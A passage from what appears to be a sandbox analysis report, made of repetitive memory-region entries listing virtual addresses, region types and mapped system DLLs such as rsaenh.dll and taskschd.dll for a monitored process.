1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 9873 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9874 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9875 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9876 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9877 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9878 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9879 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9880 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9881 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9882 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9883 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9884 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9885 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9886 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9887 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9888 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9889 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9890 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9891 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9892 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9893 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9894 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9895 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9896 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9897 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9898 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9899 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9900 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9901 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9902 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9903 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9904 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9905 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9906 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9907 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9908 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9909 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9910 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9911 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9912 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9913 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9914 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9915 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9916 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9917 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9918 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9919 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9920 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9921 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9922 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9923 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9924 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9925 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9926 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9927 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9928 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9929 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9930 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9931 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9932 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9933 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9934 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9935 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 9936 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9937 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9938 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9939 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9940 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9941 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9942 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9943 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9944 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9945 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9946 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9947 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9948 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9949 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9950 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9951 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9952 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9953 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9954 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9955 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9956 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9957 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9958 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9959 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9960 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9961 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9962 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9963 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9964 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9965 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9966 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9967 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9968 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9969 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9970 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9971 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9972 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9973 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9974 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9975 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9976 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9977 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9978 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9979 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 9980 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9981 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 9982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = 